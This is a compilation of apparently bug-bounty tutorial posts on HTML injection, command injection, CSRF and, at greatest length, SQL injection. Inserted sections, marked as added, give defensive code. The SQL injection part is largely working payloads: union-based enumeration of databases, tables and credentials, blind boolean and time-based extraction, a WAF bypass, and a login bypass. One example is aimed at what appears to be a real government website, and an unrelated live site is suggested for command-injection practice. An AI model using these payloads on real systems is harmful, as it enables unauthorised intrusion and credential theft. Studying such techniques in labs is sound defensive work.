Introduction:

The OWASP (Open Web Application Security Project) Top 10 list outlines the most pressing security concerns for software developers and organizations. These vulnerabilities represent the most significant threats to software security today. Let's explore each one in simple terms.

1. Injection

Injection flaws occur when attackers sneak malicious code into an application. This can lead to severe consequences like data breaches or even complete system compromise.

Example: Sending harmful data to a login form can trick the system into granting unauthorized access.




How To Hunt For HTML Injection (HTMLi) Practical Demonstration

Welcome Hunters,

Today I am going to show you how to hunt for HTML Injection in a web application.
Let's continue.

What is HTML Injection?

According to OWASP, HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

In simple words, HTML injection occurs when a user controls an input point and can inject arbitrary HTML code into a vulnerable web page.

Impact Of HTML Injection

➤ It can allow an attacker to modify the page.
➤ The DOM can be loaded there.

Steps To Find HTML Injection

➤ Find an input parameter, either GET based or POST based.

➤ If your input is reflected back to you on the web page, there may be HTMLi.

➤ Execute any HTML code; if you succeed in executing HTML code there, then there is HTMLi.


How To Attack 

➤ You need to find some vulnerable columns on the target website. We can use Burp Suite to spider the website and find out the parameters on the target website.


➤ Input a word there; if it is reflected back, then there is a chance of HTMLi. That is, find any input field and try any word; if your word is reflected back to you, there may be HTML Injection.


➤ As we have found the vulnerable input here, we will try to inject HTMLi code to affect the web page.

➤ <h1> you have bin hacked by Geekyworld</h1>
➤ <h1></h1> - the heading tags of the body in HTML code, used for managing the web interface

➤ GET based – through the URL: in cat=1, replace 1 with hello

So it will be reflected on the web page. We can try this to affect the web page.

➤ <h1> you have bin hacked by Cybersecbroo</h1>


➤ POST based – through the comment field

We will try to inject the HTMLi code into the Name and Comment fields. If they reflect the values back, we will try the script, and it will be reflected on the web page.
We can try this to affect the web page.
➤ <h1> you have bin hacked by Cybersecbroo</h1>
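
The fix for the reflection shown above, as an added example that is not part of the original post: the same value rendered without and with HTML encoding, plus a check that classifies how a response reflects a probe. The renderers, the `cat` page layout and the probe string are constructed for illustration.

```python
import html

# Constructed probe with the same shape as the <h1> test string in the post.
PROBE = "<h1>probe-7f3a</h1>"


def render_vulnerable(cat: str) -> str:
    """Before: the cat parameter is concatenated into the page as markup."""
    return "<html><body><p>Category: " + cat + "</p></body></html>"


def render_safe(cat: str) -> str:
    """After: the value is HTML-encoded before it reaches element content."""
    return ("<html><body><p>Category: "
            + html.escape(cat, quote=True)
            + "</p></body></html>")


def render_name_field_safe(name: str) -> str:
    """Attribute context (the Name field): quotes must be encoded as well."""
    return '<input name="name" value="' + html.escape(name, quote=True) + '">'


def reflection_state(body: str, probe: str) -> str:
    """Classify how body reflects probe.

    'absent'    - the probe does not appear at all
    'reflected' - a plain word came back; this proves reflection only
    'raw'       - markup came back unencoded, so the browser will parse it
    'escaped'   - markup came back HTML-encoded and is displayed as text
    """
    encoded = html.escape(probe, quote=True)
    if probe not in body and encoded not in body:
        return "absent"
    if encoded == probe:
        return "reflected"
    return "raw" if probe in body else "escaped"


if __name__ == "__main__":
    for render in (render_vulnerable, render_safe):
        print(render.__name__, reflection_state(render(PROBE), PROBE))
```

Run as a regression test against your own templates, `reflection_state` should never return `raw` for any parameter.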


So this was the practical demonstration of how to hunt for HTML Injection. I hope you enjoyed it and that it will help you hunt vulnerabilities more quickly.
If you find any error or mistake, please let me know in the comment box; you can also send me your query through the Contact Us section.
Thank you, happy hunting,

Follow Us on
Facebook: Cybersec_broo
Instagram: Cybersec_broo

How To Hunt For Command Injection Step by Step (CI)?
Welcome Hunters,

Today we are going to talk about Command Injection (CI), which is a critical vulnerability according to the OWASP Top 10.


Background Concept of Command Injection:

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed and inject arbitrary further commands that will be executed by the server.

Impact of Command Injection

By exploiting a command injection vulnerability, an attacker can abuse the function to inject his own operating system commands. This means that he can easily take complete control over a web server.

Example of Command Injection 

➤ A common function exists that passes an IP address the user specifies to the system's ping command. Therefore, if the user specifies 127.0.0.1 as an IP address, the command will look like this:
  ping -c5 127.0.0.1

➤ Since it is possible to break out of the ping command or provoke an error with useful information, the attacker can use this functionality to execute his own commands. An example of adding a second system command could look like this:
  ping -c5 127.0.0.1; id

How To find Command Injection?

➤ Use delimiters to break or continue the execution of commands there

Delimiter List

➤ ; ^ &

➤ &&

➤ ||

➤ %0D

➤ %0A , \n

➤ <
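
The hardened form of the ping function from the example above, as an added example that is not part of the original post: the input must parse as a single IPv4 literal and the command is built as an argument list that never passes through a shell. The function names are hypothetical and the sample inputs are constructed from the delimiter list.

```python
import ipaddress
import subprocess

# Constructed inputs: the address from the example followed by each delimiter
# on the list above (%0D and %0A shown decoded) and a second command.
DELIMITER_SAMPLES = [
    "127.0.0.1" + d + "id"
    for d in (";", "^", "&", "&&", "||", "\r", "\n", "<")
]


def vulnerable_command(user_ip: str) -> str:
    """Before: one string handed to a shell, so metacharacters become syntax."""
    return "ping -c5 " + user_ip


def ping_argv(user_ip) -> list:
    """After: return an argv list, or raise ValueError for anything that is
    not exactly one IPv4 literal.

    IPv4 only on purpose: an IPv6 scope id ("fe80::1%...") may carry
    arbitrary characters, and a leading "-" would be read by ping as an
    option. Both fail this check.
    """
    if not isinstance(user_ip, str):
        raise ValueError("address must be a string")
    addr = ipaddress.IPv4Address(user_ip)  # AddressValueError is a ValueError
    # Use the parsed, canonical form, never the raw input.
    return ["ping", "-c5", str(addr)]


def run_ping(user_ip: str, timeout: int = 15) -> subprocess.CompletedProcess:
    """Execute ping without a shell; delimiters have no meaning in argv."""
    return subprocess.run(
        ping_argv(user_ip),
        shell=False,
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )


def rejected(samples) -> list:
    """Return the samples that ping_argv refuses."""
    refused = []
    for sample in samples:
        try:
            ping_argv(sample)
        except ValueError:
            refused.append(sample)
    return refused


if __name__ == "__main__":
    print(vulnerable_command("127.0.0.1; id"))
    print(ping_argv("127.0.0.1"))
    print(len(rejected(DELIMITER_SAMPLES)), "of", len(DELIMITER_SAMPLES), "refused")
```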

Exploitation of Command Injection 

➤ Find an input field that interacts with the operating system shell.

➤ Try to execute system shell commands with a delimiter.

Examples

➤ ;ls

➤ &&ls

➤ ||ls 

Practice:

➤ DVWA and Mutillidae

➤ Live Site: http://projects.knmi.nl

Note: We can use Burp Suite to find parameter flaws for command injection on the target website. Again, we will use Spider for crawling the website, Repeater to modify our codes, and Intruder to brute-force the target website.
Command injection is GET based, so try to find the flawed parameter using some value.

Automated tool for Command Injection


Commix is a python based tool to execute OS commands automatically


Command Injection Payloads


So this was the tutorial on Command Injection. I hope it will help you hunt bugs more quickly.
If you have any query, you can put it in the comment box. If you find any error or mistake, please let me know in the comment section or by email: rajeshsahan507@gmail.com
Thank you, happy hunting.


How To Hunt For Cross Site Request Forgery?
Welcome Hunters,

➤ Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.
➤ CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
➤ With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
➤ If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth.
➤ If the victim is an administrative account, CSRF can compromise the entire web application.

Why Does a CSRF Attack Work?

CSRF attacks work because the website never verifies whether the request came from a legitimate user; instead, it just verifies that the request came from the browser of the authorized user.

How CSRF Attack works

Steps
➤ A user is authenticated on a website, say hackerone.com
➤ The attacker tricks the victim into visiting a domain he controls, say attacker.com
➤ attacker.com contains the malicious code, which sends a request to hackerone.com to perform a specific action, say changing the victim's website language.
➤ hackerone.com assumes that the request was sent from the victim's browser, does not verify it, and hence changes the victim's language
Note: So, in CSRF we will create a fake page of the victim website.
Because most of the forms are POST based, we will try to make a form.
Tool: Burp Suite
We will create a fake page and try to send it to the victim, so if the victim responds to that server there might be a chance of getting the input credentials of the target.

Injection point for CSRF – Cross site request forgery


 CSRF can be GET based

 The function is called through the URL.

If you send this to your victim and he clicks on the link, we can generate a malicious page with the tag on it.

GET Based CSRF on Logout

In this case we send the victim a link to *logout.php*. If the victim clicks on that link, the victim's session will be logged out, because we have sent him the link to *logout.php* on the same server.

CSRF can be POST based

The function is called through a POST form, for example a fake login form or a fake page.

GET Based CSRF Example

Let's assume that the website geekyworld.in utilizes a GET request to change the password. The request looks like the following:
http://geekyworld.in/password.php?newpass=geeky@&confpass=world
The attacker can now modify the newpass and confpass parameters with his own password and force the victim's browser to perform a GET request, and hence the password would be changed to what the attacker set up. The code for forcing the victim's browser to make a GET request would look something like this:
<img src="http://geekyworld.in/password.php?newpass=geeky&confpass=world" width="100" height="100">

Note: I hope you guys have knowledge of HTML, because I am not going to explain it. If not, you have to learn it if you want to be a bug bounty hunter.

CSRF Protection Technique 

➤ Referrer-Based Checking
➤ Anti-CSRF Tokens
➤ Brute Forcing Weak Anti CSRF Token Algorithm
➤ Tokens Not Validated Upon server
➤ Analyzing Weak Anti CSRF Tokens Strength
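
An added example, not part of the original post, of the anti-CSRF token approach applied to the password.php case above: the handler refuses state changes over GET and requires a token bound to the session with an HMAC and checked on the server. The handler, its status codes and the session ids are hypothetical; session ids are assumed to be opaque strings chosen by the server.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; generated at import time only for this demo.
SERVER_KEY = secrets.token_bytes(32)


def _mac(session_id: str, nonce: str) -> str:
    msg = session_id.encode() + b"\x00" + nonce.encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id: str) -> str:
    """Token = unpredictable nonce + HMAC tying that nonce to one session."""
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(session_id, nonce)


def token_valid(session_id: str, token) -> bool:
    """Server-side check; a missing or malformed token is simply invalid."""
    if not isinstance(token, str) or token.count(".") != 1:
        return False
    nonce, mac = token.split(".")
    if len(nonce) != 32 or any(c not in "0123456789abcdef" for c in nonce):
        return False
    expected = _mac(session_id, nonce)
    # Constant-time comparison, so the check leaks nothing about the MAC.
    return hmac.compare_digest(mac.encode(), expected.encode())


def change_password(method: str, session_id: str, form: dict) -> int:
    """Hypothetical handler for the password change; returns an HTTP status."""
    if method != "POST":
        # State changes never run on GET, so an <img src=...> cannot fire one.
        return 405
    if not token_valid(session_id, form.get("csrf_token")):
        return 403
    newpass = form.get("newpass")
    if not newpass or newpass != form.get("confpass"):
        return 400
    return 200


if __name__ == "__main__":
    sid = "constructed-session-A"
    good = {"newpass": "n3w", "confpass": "n3w", "csrf_token": issue_token(sid)}
    print(change_password("GET", sid, good))    # 405
    print(change_password("POST", sid, good))   # 200
```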
--------------------------------------------------------------------------------------------------------------------------

So I hope this will help you hunt vulnerabilities more quickly. If you find any mistake, please let me know in the comment box or here: rajeshsahan507@gmail.com
Thank you and happy hunting, keep shining

How to Hunt For SQL Injection learn Practically with background Concept

Welcome Hunters,

Blind SQL (Structured Query Language) injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL injection vulnerability more difficult, but not impossible.

Background Concept About SQL Injection

* How SQL Injection works

➤ In order to run malicious SQL queries against a database server, an attacker must first find an input within the web application that is included inside an SQL query.

➤ In order for an SQL injection attack to take place, the vulnerable website needs to directly include user input within an SQL statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server.

Note: The whole process works in the background. In SQLi we try to retrieve data from the backend to gain credentials related to the target website.

Injection point For SQL Injection

 ➤ SQL Injection can be GET Based
 ➤ SQL Injection can be POST Based
 ➤ SQL Injection can be Header Based
 ➤ SQL Injection can be Cookie Based

Note: To execute your SQLi queries you have to find some input form in which to execute the commands.

SQL Injection GET based
The attacker has to attack through the URL's parameters to execute the commands.
Example: www.any.com/filename.programmning?parameter=value

SQL Injection POST based
The attacker has to find any HTML form that may execute an SQLi query.
Example: signup form, login form, etc.

SQL Injection HEADER based
In this process we have to execute the SQLi commands through the header parameters of the target website. The headers to look for:
Example: Referrer | User-Agent | Location | Host.

SQL Injection Cookie Based
In this process we have to execute the command through the cookie parameters to accomplish our target. (We have to find the cookies from the web browser.)
For this, just visit any website, intercept the request through Burp Suite and put a backslash at the end of the cookie. If you find any error related to SQL in the response, then there may be SQL injection.

Note: You can use a single quote (') as well as a double quote (") to break the SQL statement
Example: Cookie: username:sdh@#$;

Now I hope you have a basic idea of what SQL injection is, how many types of SQL injection there are, and how to find SQL injection.
Now we will see how to fix the query of the SQL statement, because query fixing is the second step of SQL injection after finding the injection point.

Let's continue,

Learn SQL Injection query Fixing

➤ Identify SQL Injection vulnerability

'
"
\

')

")


➤ Balance the query

http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}
select id ='id' where name ='xyz' {background}


How to fix

Basically, you just need to put --+ at the end of the vulnerable parameter, after the single quote or double quote, to balance the query (-- is used in MySQL as a comment)

http://192.168.1.103/sqli-labs-master/Less-1/?id=1'   --  

select id ='1'    --  ' where name ='xyz' {background}

In Background

select id=1  --  where name =xyz

how to fix query

http://192.168.1.103/sqli-labs-master/Less-2/?id=1   --  

Find the total number of vulnerable columns

Order by 1{same page }

Order by 2 {same page }


Order by n {different page }

There are n-1 columns present

http://192.168.1.103/sqli-labs-master/Less-1/?id=1' order by 1  --   

Note:

 ➤ Order By: This is a keyword used in MySQL to display the result sorted by columns.
In a similar manner, we can use the "Group By" keyword to determine the number of columns in case the Order By keyword does not work or is blacklisted by a WAF (Web Application Firewall).

Find the exact number of vulnerable columns out of these n-1

 union all select 1,2,...n-1

Example:

union all select 1,2,3

select id=-1' union all select 1,2,3  --  where name =xyz


executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,2,3 --  

Execute any database SQLi query there, on the reflected number

Example: Database()

version()

user()

Executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),3 --  

http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),user() --  

--------------------------------------------------------------------------------------------------------------------------------------------

Situation: you are getting an error, but you are not getting the output of the union SQLi statement. In that case it may be error-based SQLi or double-query-based SQL injection.

http://192.168.1.103/sqli-labs-master/Less-5/?id=-1'  --  


error/double based sqli query -> hackbar->error/double->get database

--------------------------------------------------------------------------------------------------------------------------

Blind SQL Injection

Blind Boolean Based SQL Injection

and 1=1 {true }

and 1=2 {false }

and "a"="b"

and database()="xyz"

We cannot assume the database name

and substring(database(),1,1)="a"

http://192.168.1.103/sqli-labs-master/Less-8/?id=1'    and substring(database(),1,1)="s"  --   {true value, that means the first character of the first database is s}


http://192.168.1.103/sqli-labs-master/Less-8/?id=1'    and substring(database(),2,1)="e"  --   {true, the second character of the first database is e}

Blind Time Based SQL Injection

 ' and sleep(10) --  
" and sleep(10) --  

') and sleep(10) --  

How to extract the database for blind time-based SQLi

' and sleep(10) and 1=1 --  

I gave http://192.168.1.103/sqli-labs-master/Less-9/?id=1'   and sleep(10) and database()="security" --   It is sleeping, that means

http://192.168.1.103/sqli-labs-master/Less-9/?id=1'   and sleep(10) and database()="xyz" --   
(It is not sleeping for 10 sec)

Exploitation of GET Based sqli

1. Database List -

hackbar->union->database->group_concat

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195

2. Find tables of a database - dvwa

hackbar->union->tables->group_concat

guestbook
users

3. Find columns of a table - guestbook

comment_id
comment
name


4. Data of that columns

name,comment

hackbar->union->data->group_concat

name,"<------>",comment,"---->",third


Error Based Double Query Exploitation

What about the other databases? If you want to fetch the remaining databases, you have to increase the first value of the first LIMIT

LIMIT  1,1 - challenges

LIMIT  2,1 - dvwa

LIMIT 3,1 - metasploit

tables

Default Tables

LIMIT  0,1 -  guestbook

LIMIT  1,1 - users


LIMIT  2,1 -- you are not getting anything, which means there are only two tables


columns for double query based

LIMIT  0,1   - user_id

LIMIT  1,1.   ---  first name

LIMIT  2,1)). --- last_name

LIMIT  3,1)). ---- user

LIMIT  4,1)).  --- password

LIMIT  5,1)). -- avatar

LIMIT  0,1)). ---- nothing

Data of these columns
user        password
admin 5f4dcc3b5aa765d61d8327deb882cf99
Gordon e99a18c428cb38d5f260853678922e03
1337 8d3533d75ae2c3966d7e0d4fcc69216b
Pablo

Post Based SQLI

Balance the query

' --  

Problem: + is not working with POST based. Instead of + use a space ( ), or you can also use # to fix the query (# is also used to comment out part of the SQLi query).
-- or #

Find the total number of vulnerable columns

order by 1

Find the exact number of vulnerable columns

'  union all select 1,2  #

Execute database query

'  union all select database(),user()  #

Less -12

") union all select 1,2 #

") union all select database(),user() #


Blind boolean post based SQL Injection


'  OR 1=1  #

" OR 1=1 #

') OR 1=1 #

") OR 1=1 #


'  OR database()="security"  #

'  OR substring(database(),1,1)="a"  #

'  OR substring(database(),1,1)="s"  #
The first character of the database is s

'  OR substring(database(),2,1)="e"  #

The second character of the database is e


Blind time based

' OR sleep(10) #
" OR sleep(10) #
') OR sleep(10) #
") OR sleep(10) # {worked}

") OR sleep(10) and 1=1  #

") OR sleep(10) and substring(database(),3,1)="a"  #

The application is sleeping when we fire this

") OR sleep(10) and substring(database(),3,1)="c"  #

That means the third character of the database is c



Exploitation of POST Based SQLI


inject database query

1. Database list

hackbar -> union -> database-> group_concat

' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195


2. Find table of a database - security

' union all select (SELECT  GROUP_CONCAT(table_name  SEPARATOR  0x3c62723e)  FROM  INFORMATION_SCHEMA.TABLES  WHERE  TABLE_SCHEMA=0x7365637572697479),2 #

E-Mails

referrersuser-agents
users

3. Find columns of a table - users

hackbar->union->columns->group_concat

' union all select (SELECT  GROUP_CONCAT(column_name  SEPARATOR  0x3c62723e)  FROM  INFORMATION_SCHEMA.COLUMNS  WHERE  TABLE_NAME=0x7573657273),2 #


user_id
first_name
last_name
user
password
avatar
id
username
password

4. Data of these columns - user, password

user,"<----->", password
' union all select 1,(SELECT  GROUP_CONCAT(username,"<----->",password  SEPARATOR  0x3c62723e)  FROM  security.users) #



Error Based Double Query Exploitation Post Method

')   AND(SELECT  1  from(SELECT  COUNT(*),CONCAT((SELECT  (SELECT  (SELECT  DISTINCT  CONCAT(0x7e,0x27,CAST(schema_name  AS  CHAR),0x27,0x7e)  FROM  INFORMATION_SCHEMA.SCHEMATA  WHERE  table_schema!=DATABASE()  LIMIT  3,1))  FROM  INFORMATION_SCHEMA.TABLES  LIMIT  0,1),  FLOOR(RAND(0)*2))x  FROM  INFORMATION_SCHEMA.TABLES  GROUP  BY  x)a)  AND  1=1 #


Cookie Based SQLI

target - testphp.vulnweb.com

Balance Query

'  --


' and 'x'='x

select login='test/test'  and 'x'='x   ' where something other part of query


-------------------------------------------
Header Based sqli

Balance Query

' --

' and 'a'='a



select referrer='value ' OR SLEEP(5) and 'a'='a ' something other part of query


-------------------------------------------

WAF (Web Application Firewall) Bypassing

Earlier I tried

' order by 1 --+


When I tried

' union all select 1,2,3,4,5,6,7 --+

I got a Not Acceptable error

Either union may be an illegal keyword, or all or select may be illegal input

illegal word (word)= /*!12345word*/

' /*!12345union*/ all select 1,2,3 --+

http://multan.gov.pk/page.php?data=-2' /*!12345union*/ all select 1,2,database(),4,5,6,7 --+

Now exploit this
List of all databases

hackbar->union->database->group_concat
on any reflected number

(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)



' /*!12345union*/ all select 1,2,(SELECT+/*!12345GROUP_CONCAT*/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 --+

Authentication Bypassing through SQLI


Let's assume the background query of the login page

select username ='value1'&password='value2' where some other part of query

value1 = '   OR 1=1 --

select username =''   OR 1=1 -- '&password='value2' where some other part of query


value1= 1' OR '1'='1

select username ='1' OR '1'='1 '&password='value2' where some other part of query 
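
The defence against the query breaking shown in this post, as an added example that is not part of the original tutorial: the same login and id lookup written with string concatenation and with bound parameters, run against the page's own test values. SQLite (in memory) stands in for MySQL here, and the table, rows and function names are constructed; a real application stores password hashes, not passwords.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed three-column users table, in memory."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "constructed-pw-1"), (2, "gordon", "constructed-pw-2")],
    )
    return db


def login_vulnerable(db, username: str, password: str) -> bool:
    """Before: input is pasted into the statement, so a quote ends the string
    literal and the rest of the input is parsed as SQL."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username: str, password: str) -> bool:
    """After: the statement text is fixed; values travel separately as data."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def lookup_vulnerable(db, raw_id: str):
    """Before: the ?id= value is concatenated into the WHERE clause."""
    query = "SELECT id, username, password FROM users WHERE id = '" + raw_id + "'"
    return db.execute(query).fetchone()


def lookup_parameterized(db, raw_id: str):
    """After: type-check the id first, then bind it as a parameter."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return None
    return db.execute(
        "SELECT id, username, password FROM users WHERE id = ?", (int(raw_id),)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    value1 = "' OR 1=1 -- "                       # from the login example above
    union_id = "-1' union all select 1,2,3 -- "   # from the Less-1 example
    print("vulnerable login:   ", login_vulnerable(db, value1, "x"))
    print("parameterized login:", login_parameterized(db, value1, "x"))
    print("vulnerable lookup:   ", lookup_vulnerable(db, union_id))
    print("parameterized lookup:", lookup_parameterized(db, union_id))
```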

So guys, this was all about SQL Injection, which is the most critical vulnerability in web applications these days.
I hope this will help you hunt more quickly. If you find any grammar error, please let me know in the comment box, or send it to the mail attached in the author section.
Thank you, happy hunting

Resource from Hunter 1.0: Vikash Chaudhary